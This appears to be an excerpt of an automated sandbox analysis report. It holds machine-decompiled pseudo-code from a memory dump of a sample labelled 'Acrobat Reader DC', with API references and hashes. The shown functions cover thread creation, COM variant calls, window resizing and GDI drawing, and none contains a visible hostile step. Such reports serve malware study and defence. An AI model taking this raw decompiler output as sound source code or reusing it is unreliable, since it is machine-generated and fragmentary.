                                  			E00413D7F(struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t16;
                                  				DWORD* _t21;
                                  				void* _t33;
                                  				char _t34;
                                  				void* _t36;
                                  
                                  				_t34 = _a12;
                                  				_t26 = 0;
                                  				_t38 = _t34;
                                  				if(_t34 != 0) {
                                  					E004178AE();
                                  					_t36 = E00416B49(1, 0x214);
                                  					__eflags = _t36;
                                  					if(__eflags == 0) {
                                  						L7:
                                  						E00413748(_t36);
                                  						__eflags = _t26;
                                  						if(_t26 != 0) {
                                  							E00417F9D(_t26);
                                  						}
                                  						_t16 = 0;
                                  						__eflags = 0;
                                  						L10:
                                  						return _t16;
                                  					}
                                  					_push( *((intOrPtr*)(E00417A69(0, __eflags) + 0x6c)));
                                  					_push(_t36);
                                  					E0041793C(0, _t33, _t34, _t36, __eflags);
                                  					 *(_t36 + 4) =  *(_t36 + 4) | 0xffffffff;
                                  					 *((intOrPtr*)(_t36 + 0x58)) = _a16;
                                  					_t21 = _a24;
                                  					 *((intOrPtr*)(_t36 + 0x54)) = _t34;
                                  					__eflags = _t21;
                                  					if(_t21 == 0) {
                                  						_t21 =  &_a12;
                                  					}
                                  					_t16 = CreateThread(_a4, _a8, E00413D1A, _t36, _a20, _t21);
                                  					__eflags = _t16;
                                  					if(_t16 != 0) {
                                  						goto L10;
                                  					} else {
                                  						_t26 = GetLastError();
                                  						goto L7;
                                  					}
                                  				}
                                  				 *((intOrPtr*)(E00417F77(_t38))) = 0x16;
                                  				E00417F25();
                                  				return 0;
                                  			}













                                  APIs
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit__initptd_free
                                  • String ID:
                                  • API String ID: 73303432-0
                                  • Opcode ID: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction ID: a8fa495ec3ad1bcc0d525816251f0ff308f4c172cb7463a6c3574dd724ca7d0d
                                  • Opcode Fuzzy Hash: 15d135404abbfae3dd626878a66f96d7bdc2d254561257f6c736b1c7f734c682
                                  • Instruction Fuzzy Hash: 8E11E9321087066FD7107FA6DC459DB3BE8DF04775B20042FF91586292DB79D99186AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 70%
                                  			E0047974B(void* __fp0, intOrPtr _a4, signed char _a8, intOrPtr _a12, intOrPtr* _a16, char _a19, signed int _a20, intOrPtr _a24) {
                                  				signed int _v8;
                                  				signed int _v12;
                                  				signed int _v16;
                                  				char _v20;
                                  				signed int _v24;
                                  				signed int _v28;
                                  				char* _v32;
                                  				char _v36;
                                  				char _v40;
                                  				char _v60;
                                  				char _v92;
                                  				signed int _v224;
                                  				signed char _v232;
                                  				signed int _v236;
                                  				void* __ebx;
                                  				void* __edi;
                                  				void* __esi;
                                  				signed int _t152;
                                  				signed int _t159;
                                  				signed int _t166;
                                  				signed int _t168;
                                  				signed int _t172;
                                  				intOrPtr _t174;
                                  				signed int _t186;
                                  				signed int _t188;
                                  				signed int _t195;
                                  				signed char _t196;
                                  				signed int _t203;
                                  				signed int _t204;
                                  				signed char _t205;
                                  				short* _t206;
                                  				short* _t207;
                                  				intOrPtr* _t217;
                                  				signed int _t221;
                                  				intOrPtr* _t240;
                                  				intOrPtr _t257;
                                  				signed int _t259;
                                  				signed int _t263;
                                  				signed int _t264;
                                  				signed int _t265;
                                  				void* _t266;
                                  				void* _t267;
                                  				void* _t268;
                                  				void* _t275;
                                  
                                  				_t275 = __fp0;
                                  				_t240 = _a16;
                                  				_t263 =  *(_a24 + 8);
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v28 = 0;
                                  				_v24 = 0;
                                  				_v40 = 0xfffffffd;
                                  				_v12 = 0;
                                  				_v16 = 0;
                                  				_a19 = 0;
                                  				if(_t240 == 0 || _a12 == 0 || _a20 == 0) {
                                  					return E00451B42(_a4, 1, 0, L"NULL Pointer assignment", 1);
                                  				} else {
                                  					if(E00432416(_t240) != 0) {
                                  						_t264 =  *( *_t240 + 8);
                                  						__eflags = _t264;
                                  						if(_t264 != 0) {
                                  							_v236 = 0;
                                  							_t152 = E00441EBA(_t264, _a20,  &_v12);
                                  							_t268 = _t267 + 0xc;
                                  							__eflags = _t152;
                                  							if(_t152 >= 0) {
                                  								__eflags = _a8 - 1;
                                  								if(__eflags == 0) {
                                  									_t194 = _v12;
                                  									_a8 = 3;
                                  									__eflags = _v12;
                                  									if(__eflags != 0) {
                                  										_t195 = E00451D2B(_t264, _t194, _a20,  &_v236);
                                  										_t268 = _t268 + 0x10;
                                  										__eflags = _t195;
                                  										if(__eflags >= 0) {
                                  											_t196 = _v232;
                                  											__eflags = _t196 & 0x00000001;
                                  											if((_t196 & 0x00000001) != 0) {
                                  												__eflags = _v224;
                                  												if(_v224 == 0) {
                                  													_a19 = 1;
                                  												}
                                  											}
                                  											__eflags = _t196 - 1;
                                  											if(__eflags == 0) {
                                  												_a8 = _t196;
                                  											}
                                  										}
                                  									}
                                  								}
                                  								_t203 = _t263 + 1;
                                  								_push( ~(0 | __eflags > 0x00000000) | ( ~(0 | __eflags > 0x00000000) | _t203 * 0x00000010) + 0x00000004);
                                  								_t159 = E00410E53(_t263, _t264, __eflags);
                                  								__eflags = _t159;
                                  								if(_t159 == 0) {
                                  									_a20 = 0;
                                  								} else {
                                  									 *_t159 = _t203;
                                  									_t41 = _t159 + 4; // 0x4
                                  									_a20 = _t41;
                                  									E00410CA0(_t263 + 1, 0x437095, _t41, 0x10);
                                  								}
                                  								_t204 = 0;
                                  								__eflags = _t263;
                                  								if(_t263 != 0) {
                                  									_t259 = _t263 + _t263;
                                  									__eflags = _t259;
                                  									_t49 = _t259 * 8; // -16
                                  									_v8 = _a20 + _t49 - 0x10;
                                  									do {
                                  										E00479714( *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)), _t263, _t275, _v8,  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t204 * 4)));
                                  										_v8 = _v8 - 0x10;
                                  										_t204 = _t204 + 1;
                                  										__eflags = _t204 - _t263;
                                  									} while (_t204 < _t263);
                                  								}
                                  								__eflags = _v236;
                                  								if(_v236 != 0) {
                                  									_t186 = 0;
                                  									_v8 = 0;
                                  									__eflags = _t263;
                                  									if(_t263 != 0) {
                                  										_t63 = (_t263 + _t263) * 8; // -16
                                  										_t207 = _a20 + _t63 - 0x10;
                                  										do {
                                  											__eflags =  *((short*)(_t266 + _t186 * 4 - 0xd6)) - 2;
                                  											if( *((short*)(_t266 + _t186 * 4 - 0xd6)) == 2) {
                                  												__imp__#9(_t207);
                                  												_t188 = _v8;
                                  												 *_t207 =  *((intOrPtr*)(_t266 + _t188 * 4 - 0xd8));
                                  												_t257 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t188 * 4));
                                  												__eflags =  *((intOrPtr*)(_t257 + 8)) - 6;
                                  												if( *((intOrPtr*)(_t257 + 8)) != 6) {
                                  													 *((intOrPtr*)(_t207 + 8)) = _t207;
                                  												}
                                  											}
                                  											_t186 = _v8 + 1;
                                  											_t207 = _t207 - 0x10;
                                  											_v8 = _t186;
                                  											__eflags = _t186 - _t263;
                                  										} while (_t186 < _t263);
                                  									}
                                  								}
                                  								_t205 = _a8;
                                  								_v28 = _t263;
                                  								_v36 = _a20;
                                  								__eflags = _t205 & 0x0000000c;
                                  								if((_t205 & 0x0000000c) != 0) {
                                  									_v24 = 1;
                                  									_v32 =  &_v40;
                                  								}
                                  								__imp__#8( &_v60);
                                  								E00412F40( &_v92, 0, 0x20);
                                  								__eflags = _a19;
                                  								if(_a19 == 0) {
                                  									_push( &_v20);
                                  									_push( &_v92);
                                  									_push( &_v60);
                                  									_push( &_v36);
                                  									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
                                  								} else {
                                  									_t217 =  *((intOrPtr*)( *_t264 + 0x18));
                                  									_push( &_v20);
                                  									_push( &_v92);
                                  									_push(0);
                                  									_push( &_v36);
                                  								}
                                  								_t166 =  *_t217(_t264, _v12, 0x482a18, 0x800, _t205);
                                  								__eflags = _t166 - 0x80020003;
                                  								if(_t166 != 0x80020003) {
                                  									L38:
                                  									__eflags = _t166;
                                  									if(_t166 >= 0) {
                                  										E00468070(_a12,  &_v60);
                                  										_t265 = 0;
                                  										__eflags = _t263;
                                  										if(_t263 != 0) {
                                  											_t172 = _t263 + _t263;
                                  											__eflags = _t172;
                                  											_t121 = _t172 * 8; // -16
                                  											_t206 = _a20 + _t121 - 0x10;
                                  											do {
                                  												__eflags = _v236;
                                  												if(_v236 == 0) {
                                  													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
                                  													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
                                  													if( *((intOrPtr*)(_t174 + 8)) == 6) {
                                  														goto L52;
                                  													}
                                  												} else {
                                  													_t174 =  *((intOrPtr*)( *((intOrPtr*)(_a24 + 4)) + _t265 * 4));
                                  													__eflags =  *((intOrPtr*)(_t174 + 8)) - 6;
                                  													_t221 =  *(_t266 + _t265 * 4 - 0xd8) & 0x0000ffff;
                                  													if( *((intOrPtr*)(_t174 + 8)) == 6) {
                                  														__eflags = _t221 - 0x6013;
                                  														if(_t221 != 0x6013) {
                                  															__eflags =  *(_t266 + _t265 * 4 - 0xd6) & 0x00000002;
                                  															if(( *(_t266 + _t265 * 4 - 0xd6) & 0x00000002) != 0) {
                                  																L52:
                                  																E00468070(E00432508(_t174), _t206);
                                  															} else {
                                  																__eflags = _t221 & 0x00004000;
                                  																if((_t221 & 0x00004000) != 0) {
                                  																	goto L52;
                                  																} else {
                                  																	__eflags =  *_t206 - 8;
                                  																	if( *_t206 == 8) {
                                  																		goto L52;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  												_t265 = _t265 + 1;
                                  												_t206 = _t206 - 0x10;
                                  												__eflags = _t265 - _t263;
                                  											} while (_t265 < _t263);
                                  										}
                                  									} else {
                                  										__eflags = _t166 - 0x80020009;
                                  										if(_t166 != 0x80020009) {
                                  											goto L41;
                                  										} else {
                                  											_v16 = E00451B42(_a4, _t166,  &_v92, 0, 1);
                                  										}
                                  									}
                                  								} else {
                                  									__eflags = _v24 - 1;
                                  									if(_v24 != 1) {
                                  										L41:
                                  										_v16 = E00451B42(_a4, _t166, 0, 0, 1);
                                  									} else {
                                  										__eflags = _t205 - 4;
                                  										_t104 = _t205 == 4;
                                  										__eflags = _t104;
                                  										_t166 =  *((intOrPtr*)( *((intOrPtr*)( *_t264 + 0x18))))(_t264, _v12, 0x482a18, 0x800, 4 + (0 | _t104) * 4,  &_v36, 0,  &_v92,  &_v20);
                                  										goto L38;
                                  									}
                                  								}
                                  								__imp__#9( &_v60);
                                  								_t168 = _a20;
                                  								__eflags = _t168;
                                  								if(_t168 != 0) {
                                  									E00470028(_t168);
                                  								}
                                  								return _v16;
                                  							} else {
                                  								return E00451B42(_a4, _t152, 0, 0, 1);
                                  							}
                                  						} else {
                                  							return E00451B42(_a4, 4, 0, L"NULL Pointer assignment", 1);
                                  						}
                                  					} else {
                                  						return E00451B42(_a4, 2, 0, L"Not an Object type", 1);
                                  					}
                                  				}
                                  			}

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Variant$Copy$ClearErrorLast
                                  • String ID: NULL Pointer assignment$Not an Object type
                                  • API String ID: 2487901850-572801152
                                  • Opcode ID: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction ID: 7224d39ad4dd36db717bb7decd6d6f3456075e50b8db1d036073f09e8ed5fad7
                                  • Opcode Fuzzy Hash: bb0f7491a1d8fcb1a9e92f7a9394b8a60bc93380917bfa262315a66d62baea93
                                  • Instruction Fuzzy Hash: 70C1AFB1A00209ABDF14DF98C881FEEB7B9EB44304F10C55EE909AB341D7799D85CBA5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 89%
                                  			E004404E8(signed int _a4, signed int _a8, signed int _a12, signed int _a16) {
                                  				int _v8;
                                  				int _v12;
                                  				int _v16;
                                  				signed int _v20;
                                  				struct HWND__** _v24;
                                  				signed int _v28;
                                  				void* _t152;
                                  				signed int _t153;
                                  				signed int _t159;
                                  				int _t160;
                                  				signed int _t173;
                                  				signed char _t175;
                                  				int _t176;
                                  				struct HWND__* _t179;
                                  				signed char _t181;
                                  				signed char _t186;
                                  				signed int _t189;
                                  				signed int _t201;
                                  				signed int _t207;
                                  				int _t213;
                                  				int _t214;
                                  				signed int _t218;
                                  				intOrPtr _t223;
                                  				signed int _t227;
                                  				signed int _t232;
                                  				intOrPtr _t242;
                                  				signed int _t246;
                                  				signed int _t249;
                                  				signed int _t250;
                                  				signed char _t251;
                                  				struct HWND__** _t260;
                                  				signed int _t261;
                                  				struct HWND__* _t268;
                                  				struct HWND__** _t269;
                                  				void* _t277;
                                  				void* _t295;
                                  
                                  				_t213 = _a8;
                                  				_t268 = _a4;
                                  				_t153 = E00430C09(_t152, 0x4a8630, _t268);
                                  				_t223 =  *0x4a8690; // 0x0
                                  				_t260 =  *( *(_t223 + _t153 * 4));
                                  				_v24 = _t260;
                                  				_a4 = _t260[0x11];
                                  				_a8 = _t260[0x12];
                                  				if(_t260[0x68] != 0) {
                                  					_a8 = _a8 - GetSystemMetrics(0xf);
                                  				}
                                  				if(_a4 <= 0 || _a8 <= 0 || _a12 <= 0 || _a16 <= 0 || _t213 == 1) {
                                  					return DefDlgProcW(_t268, 5, _t213, (_a16 & 0x0000ffff) << 0x00000010 | _a12 & 0x0000ffff);
                                  				} else {
                                  					_t159 = 3;
                                  					_v28 = 3;
                                  					_t277 =  *0x4a86b4 - _t159; // 0x2
                                  					if(_t277 >= 0) {
                                  						do {
                                  							_t242 =  *0x4a86a4; // 0xa71980
                                  							_t269 =  *( *(_t242 + _t159 * 4));
                                  							if(_t269 != 0 && _t269[1] == _t260[1] &&  *_t269 != 0) {
                                  								asm("cdq");
                                  								_t227 = _t269[0x21];
                                  								_t261 = _t269[0x21];
                                  								_v8 = _t269[0x20] * _a12 / _a4;
                                  								asm("cdq");
                                  								_v20 = _t269[0x20] * _a16 / _a8;
                                  								asm("cdq");
                                  								_v16 = _t227 * _a12 / _a4;
                                  								_t173 = _t261 * _a16;
                                  								asm("cdq");
                                  								_t246 = _t173 % _a8;
                                  								_v12 = _t173 / _a8;
                                  								_t175 = _t269[0x1f] & 0x0000ffff;
                                  								if(_t175 == 0) {
                                  									_t176 = _v20;
                                  									_t214 = _v8;
                                  								} else {
                                  									if((_t175 & 0x00000100) == 0) {
                                  										L19:
                                  										_t214 = _v8;
                                  									} else {
                                  										_v16 = _t227;
                                  										if((_t175 & 0x00000006) != 0) {
                                  											goto L19;
                                  										} else {
                                  											_t201 = _a12;
                                  											if((_t175 & 0x00000008) == 0) {
                                  												_t214 = _v8;
                                  												asm("cdq");
                                  												if(_t214 > _t201 - _t246 >> 1) {
                                  													_t218 = _a4;
                                  													_t207 = (_t218 - _t269[0x20] - _v16) * _a12;
                                  													asm("cdq");
                                  													_t246 = _t207 % _t218;
                                  													_t214 = _a12 - _t207 / _t218 - _v16;
                                  													_v8 = _t214;
                                  												}
                                  											} else {
                                  												asm("cdq");
                                  												_t214 = _t269[0x20] + (_t201 - _a4 - _t246 >> 1);
                                  												_v8 = _t214;
                                  											}
                                  										}
                                  									}
                                  									_t186 = _t269[0x1f] & 0x0000ffff;
                                  									if((_t186 & 0x00000200) == 0) {
                                  										L26:
                                  										_t176 = _v20;
                                  									} else {
                                  										_v12 = _t261;
                                  										if((_t186 & 0x00000060) != 0) {
                                  											goto L26;
                                  										} else {
                                  											_t189 = _a16;
                                  											if(_t186 >= 0) {
                                  												asm("cdq");
                                  												_t176 = _v20;
                                  												if(_t176 > _t189 - _t246 >> 1) {
                                  													_t217 = _a8;
                                  													asm("cdq");
                                  													_t214 = _v8;
                                  													_t176 = _a16 - (_a8 - _t269[0x20] - _v12) * _a16 / _t217 - _v12;
                                  												}
                                  											} else {
                                  												asm("cdq");
                                  												_t176 = _t269[0x20] + (_t189 - _a8 - _t246 >> 1);
                                  											}
                                  										}
                                  									}
                                  									_t249 = _t269[0x1f] & 0x0000ffff;
                                  									_v20 = _t249;
                                  									_t250 = _t249 & 0x00000002;
                                  									_v8 = _t250;
                                  									if(_t250 != 0) {
                                  										_t214 = _t269[0x20];
                                  									}
                                  									if((_v20 & 0x00000004) != 0) {
                                  										if(_v8 == 0) {
                                  											_t214 = _t269[0x20] + _t227 - _v16 - _a4 + _a12;
                                  										} else {
                                  											_v16 = _t227 - _t214 - _a4 + _t269[0x20] + _a12;
                                  										}
                                  									}
                                  									_t251 = _v20;
                                  									_t232 = _t251 & 0x00000020;
                                  									if(_t232 != 0) {
                                  										_t176 = _t269[0x20];
                                  									}
                                  									if((_t251 & 0x00000040) != 0) {
                                  										if(_t232 == 0) {
                                  											_t176 = _t269[0x20] + _t261 - _v12 - _a8 + _a16;
                                  										} else {
                                  											_v12 = _t261 - _t176 - _a8 + _t269[0x20] + _a16;
                                  										}
                                  									}
                                  								}
                                  								MoveWindow( *_t269, _t214, _t176, _v16, _v12, 0);
                                  								_t179 = _t269[0x22];
                                  								if(_t179 != 0) {
                                  									if(_t179 != 0x16 || (_t269[0x22] & 0x00000020) != 0) {
                                  										goto L42;
                                  									} else {
                                  										SendMessageW( *_t269, 0x469, _t269[0xc], 0);
                                  										_t181 = _t269[0x22];
                                  										if(_t181 == 0xff) {
                                  											goto L42;
                                  										} else {
                                  											_t260 = _v24;
                                  											if((_t181 & 0x000000ff) != _t260[0x65]) {
                                  												ShowWindow( *_t269, 0);
                                  											}
                                  											goto L43;
                                  										}
                                  									}
                                  									goto L51;
                                  								} else {
                                  									SendMessageW( *_t269, 0x142, 0, 0xffff);
                                  									L42:
                                  									_t260 = _v24;
                                  								}
                                  							}
                                  							L43:
                                  							_t159 = _v28 + 1;
                                  							_v28 = _t159;
                                  							_t295 = _t159 -  *0x4a86b4; // 0x2
                                  						} while (_t295 <= 0);
                                  					}
                                  					_t160 = InvalidateRect( *_t260, 0, 1);
                                  					_t260[0x62] = 1;
                                  					_t260[0xe] = 0;
                                  					return _t160;
                                  				}
                                  				L51:
                                  			}








































                                  APIs
                                  • GetSystemMetrics.USER32 ref: 00440527
                                  • MoveWindow.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00440763
                                  • SendMessageW.USER32(?,00000142,00000000,0000FFFF), ref: 00440782
                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 004407A5
                                  • SendMessageW.USER32(?,00000469,?,00000000), ref: 004407DA
                                  • ShowWindow.USER32(?,00000000,?,00000469,?,00000000), ref: 004407FD
                                  • DefDlgProcW.USER32(?,00000005,?,?), ref: 00440817
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: MessageSendWindow$InvalidateMetricsMoveProcRectShowSystem
                                  • String ID:
                                  • API String ID: 1457242333-0
                                  • Opcode ID: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction ID: 469fbb3f3db71b9324cb07d082b932f31bc4dcc79b85a5821822f518eef070f3
                                  • Opcode Fuzzy Hash: d4bac657e1d3c25226f3662cee365975ebc34d7204b8b764d69e27e9e2fa035e
                                  • Instruction Fuzzy Hash: 0BB19F71600619EFEB14CF68C984BAFBBF1FF48301F15851AEA5597280D738BA61CB54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E0044734F(void* __fp0, long* _a4, intOrPtr _a8, char _a11) {
                                  				long _v8;
                                  				struct tagPOINT* _v12;
                                  				long _v16;
                                  				long _v20;
                                  				int _v24;
                                  				intOrPtr _v28;
                                  				intOrPtr _v32;
                                  				intOrPtr _v68;
                                  				void* _t97;
                                  				struct tagPOINT* _t99;
                                  				long _t100;
                                  				intOrPtr _t108;
                                  				intOrPtr _t109;
                                  				intOrPtr _t110;
                                  				void* _t112;
                                  				long* _t113;
                                  
                                  				_t113 = _a4;
                                  				_t109 = _a8;
                                  				_t100 = 0xfffffffe;
                                  				_a11 = 0;
                                  				_v20 = 0;
                                  				_v16 = 0xfffffffe;
                                  				_v24 = 1;
                                  				_v28 = _t109;
                                  				if(_t109 == 0) {
                                  					L26:
                                  					E0042FD29(_t113, _t100);
                                  					return _a11;
                                  				}
                                  				while(1) {
                                  					_v12 = 0;
                                  					E0044719B(_t113, _v20, _t100, 0, _v24);
                                  					if( *((intOrPtr*)(_t109 + 0xc)) <= 0) {
                                  						goto L25;
                                  					}
                                  					_v8 = _t109 + 0x10;
                                  					_a4 = _t109 + 0x14;
                                  					do {
                                  						_t112 =  *_v8;
                                  						_t97 = ( *(_v28 + _v12 + 0x810) & 0x000000ff) + 0xfffffff8;
                                  						if(_t97 > 0x10) {
                                  							goto L23;
                                  						}
                                  						switch( *((intOrPtr*)(( *(_t97 + 0x4475bb) & 0x000000ff) * 4 +  &M00447597))) {
                                  							case 0:
                                  								__edi = __edi | 0xffffffff;
                                  								if(_v20 != __edi) {
                                  									__edx = _v16;
                                  									__eax = E0042FD29(__esi, _v16);
                                  								}
                                  								__eax = _v8;
                                  								__eax =  *_v8;
                                  								if(__eax != __edi) {
                                  									_v20 = __eax;
                                  								}
                                  								__eax =  *_a4;
                                  								if(__eax != __edi) {
                                  									_v16 = __eax;
                                  								}
                                  								__edx = _v24;
                                  								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
                                  								goto L23;
                                  							case 1:
                                  								__edx = _v16;
                                  								_v12 =  &(_v12->x);
                                  								__eax = 8;
                                  								_a4 =  &(_a4[2]);
                                  								_v8 = _v8 + 8;
                                  								E0042FD29(__esi, _v16) = _v24;
                                  								__edx = _v20;
                                  								E0044719B(__esi, _v20, _v16, 0, _v24) = _a4;
                                  								__edx = _v8;
                                  								__eax =  *_v8;
                                  								_push( *_a4 + __ebx);
                                  								__eax =  *_v8 + __edi;
                                  								_push( *_v8 + __edi);
                                  								goto L22;
                                  							case 2:
                                  								_v12 =  &(_v12->x);
                                  								__eax = 8;
                                  								_a4 =  &(_a4[2]);
                                  								_v8 = _v8 + 8;
                                  								__eax = E0042FD29(__esi, _v16);
                                  								__edx = _v24;
                                  								_v16 = E0044719B(__esi, _v20, _v16, 0, _v24);
                                  								__edx = _a4;
                                  								__eax =  *_a4;
                                  								__edx =  *_v8;
                                  								__eax =  *_a4 + __ebx;
                                  								__edx =  *_v8 + __edi;
                                  								__eax = Ellipse(__esi, __edi, __ebx,  *_v8 + __edi,  *_a4 + __ebx);
                                  								goto L23;
                                  							case 3:
                                  								__eax = MoveToEx(__esi, __edi, __ebx, 0);
                                  								__eax = _v8;
                                  								asm("fild dword [ecx+0x8]");
                                  								__edx =  *(__eax + 8);
                                  								_v12 =  &(_v12->x);
                                  								_v12 =  &(_v12->x);
                                  								_v32 = __fp0;
                                  								asm("fild dword [eax+0x10]");
                                  								__eax = __eax + 0x10;
                                  								__esp = __esp - 8;
                                  								_v68 = __fp0;
                                  								_a4 =  &(_a4[4]);
                                  								__fp0 = _v32;
                                  								_v8 = __eax;
                                  								 *__esp = __fp0;
                                  								AngleArc(__esi, __edi, __ebx, __edx, ??, ??) = LineTo(__esi, __edi, __ebx);
                                  								__eax = CloseFigure(__esi);
                                  								goto L23;
                                  							case 4:
                                  								__eax = _v24;
                                  								_t75 = __eax + 1; // 0xffffffff
                                  								__edx = __ebx + _t75;
                                  								_push(__ebx + _t75);
                                  								__ebx = __ebx - __eax;
                                  								_push(__edi + __eax + 1);
                                  								__edi = __edi - __eax;
                                  								L22:
                                  								__eax = Rectangle(__esi, __edi, __ebx, ??, ??);
                                  								goto L23;
                                  							case 5:
                                  								__eax = SetPixel(__esi, __edi, __ebx, _v20);
                                  								goto L23;
                                  							case 6:
                                  								if(_t112 != 0) {
                                  									_a11 = 1;
                                  								}
                                  								goto L23;
                                  							case 7:
                                  								_v24 = __edi;
                                  								goto L23;
                                  							case 8:
                                  								goto L23;
                                  						}
                                  						L23:
                                  						_t108 = _v28;
                                  						_a4 = _a4 + 8;
                                  						_v8 = _v8 + 8;
                                  						_t99 =  &(_v12->x);
                                  						_v12 = _t99;
                                  					} while (_t99 <  *((intOrPtr*)(_t108 + 0xc)));
                                  					_t100 = _v16;
                                  					_t109 = _t108;
                                  					L25:
                                  					_t110 =  *((intOrPtr*)(_t109 + 4));
                                  					_v28 = _t110;
                                  					if(_t110 != 0) {
                                  						_t109 = _v28;
                                  						continue;
                                  					}
                                  					goto L26;
                                  				}
                                  			}




















                                  APIs
                                    • Part of subcall function 0044719B: DeleteObject.GDI32(00000000), ref: 004471D8
                                    • Part of subcall function 0044719B: ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447228
                                    • Part of subcall function 0044719B: BeginPath.GDI32(?), ref: 0044723D
                                    • Part of subcall function 0044719B: SelectObject.GDI32(?,00000000), ref: 00447266
                                  • Ellipse.GDI32(?,?,FFFFFFFE,00000000,00000000), ref: 004474C4
                                  • MoveToEx.GDI32(?,?,FFFFFFFE,00000000), ref: 004474D4
                                  • AngleArc.GDI32(?,?,FFFFFFFE,00000000), ref: 0044750F
                                  • LineTo.GDI32(?,?,FFFFFFFE), ref: 00447518
                                  • CloseFigure.GDI32(?), ref: 0044751F
                                  • SetPixel.GDI32(?,?,FFFFFFFE,00000000), ref: 0044752E
                                  • Rectangle.GDI32(?,?,FFFFFFFE,00000000), ref: 0044754A
                                  Memory Dump Source
                                  • Source File: 0000000C.00000002.313035046.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000000C.00000002.313020918.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313790548.0000000000482000.00000002.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313874718.0000000000490000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313885290.0000000000491000.00000008.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313906801.0000000000492000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313932713.00000000004A7000.00000004.00000001.01000000.00000009.sdmp
                                  • Associated: 0000000C.00000002.313959840.00000000004AB000.00000002.00000001.01000000.00000009.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_12_2_400000_Acrobat Reader DC.jbxd
                                  Similarity
                                  • API ID: Object$Select$AngleBeginCloseCreateDeleteEllipseFigureLineMovePathPixelRectangle
